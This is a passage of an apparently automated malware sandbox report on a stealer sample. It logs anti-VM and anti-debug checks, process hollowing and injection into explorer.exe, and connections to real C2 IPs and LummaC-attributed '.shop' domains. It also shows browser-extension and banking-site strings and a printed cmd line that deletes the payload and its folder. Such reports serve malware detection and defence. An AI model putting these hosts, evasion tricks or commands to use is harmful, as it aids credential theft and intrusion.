Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\A247.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rcjjrra, 00000004.00000002.2319460802.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_008B2CD7 rdtsc 5_2_008B2CD7
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 384 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2725 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 872 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 355 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1956 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 889 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 851 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6044 Thread sleep count: 384 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep count: 2725 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep time: -272500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5704 Thread sleep count: 872 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5704 Thread sleep time: -87200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 320 Thread sleep count: 216 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6768 Thread sleep count: 355 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6768 Thread sleep time: -35500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1848 Thread sleep count: 345 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1848 Thread sleep time: -34500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep count: 1956 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep time: -195600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe TID: 5548 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe TID: 5548 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 768 Thread sleep count: 54 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 9_2_6CC9EBF0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: BFBGHD.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: A247.exe, 00000005.00000003.2411290273.0000000002E55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: BFBGHD.9.dr Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2871925819.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BFBGHD.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: BFBGHD.9.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: BFBGHD.9.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: kat2225.tmp, 00000009.00000002.3185736786.0000000005120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareta=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: BFBGHD.9.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BFBGHD.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: A247.exe, 00000005.00000003.2411290273.0000000002E55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: kat2225.tmp, 00000009.00000002.3185736786.0000000005120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: BFBGHD.9.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2036556348.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFBGHD.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHHz%SystemRoot%\system32\mswsock.dll+
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: BFBGHD.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: BFBGHD.9.dr Binary or memory string: discord.comVMware20,11696428655f
Source: BFBGHD.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BFBGHD.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BFBGHD.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BFBGHD.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BFBGHD.9.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BFBGHD.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: BFBGHD.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BFBGHD.9.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BFBGHD.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BFBGHD.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: BFBGHD.9.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BFBGHD.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: BFBGHD.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\3.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\3.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\3.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra System information queried: CodeIntegrityInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_008B2CD7 rdtsc 5_2_008B2CD7
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00402A9F LdrLoadDll, 0_2_00402A9F
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_6CD6AC62
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D51EF6 push dword ptr fs:[00000030h] 0_2_02D51EF6
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E40D90 mov eax, dword ptr fs:[00000030h] 0_2_02E40D90
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E4092B mov eax, dword ptr fs:[00000030h] 0_2_02E4092B
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E20D90 mov eax, dword ptr fs:[00000030h] 4_2_02E20D90
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E2092B mov eax, dword ptr fs:[00000030h] 4_2_02E2092B
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB0FD6 push dword ptr fs:[00000030h] 4_2_02EB0FD6
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0061092B mov eax, dword ptr fs:[00000030h] 5_2_0061092B
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00610D90 mov eax, dword ptr fs:[00000030h] 5_2_00610D90
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_008ADA5B push dword ptr fs:[00000030h] 5_2_008ADA5B
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_6CD6AC62

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 5358.exe.2.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 190.187.52.42 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 88.225.215.104 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80 Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory allocated: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_043BA4F0
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\3.exe Thread created: C:\Windows\explorer.exe EIP: 33519E0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Thread created: unknown EIP: 32019E0 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: A247.exe String found in binary or memory: zippyfinickysofwps.shop
Source: A247.exe String found in binary or memory: obsceneclassyjuwks.shop
Source: A247.exe String found in binary or memory: acceptabledcooeprs.shop
Source: A247.exe String found in binary or memory: whispedwoodmoodsksl.shop
Source: A247.exe String found in binary or memory: boredimperissvieos.shop
Source: A247.exe String found in binary or memory: holicisticscrarws.shop
Source: A247.exe String found in binary or memory: sweetsquarediaslw.shop
Source: A247.exe String found in binary or memory: plaintediousidowsko.shop
Source: A247.exe String found in binary or memory: miniaturefinerninewjs.shop
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\3.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\3.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section unmapped: C:\Users\user\AppData\Local\Temp\kat2225.tmp base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 422000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 42E000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 641000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDB4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 9_2_6CDB4760
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2036443030.0000000004B00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2035435817.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6AE71 cpuid 9_2_6CD6AE71
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_6CD6A8DC
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB8390 NSS_GetVersion, 9_2_6CCB8390
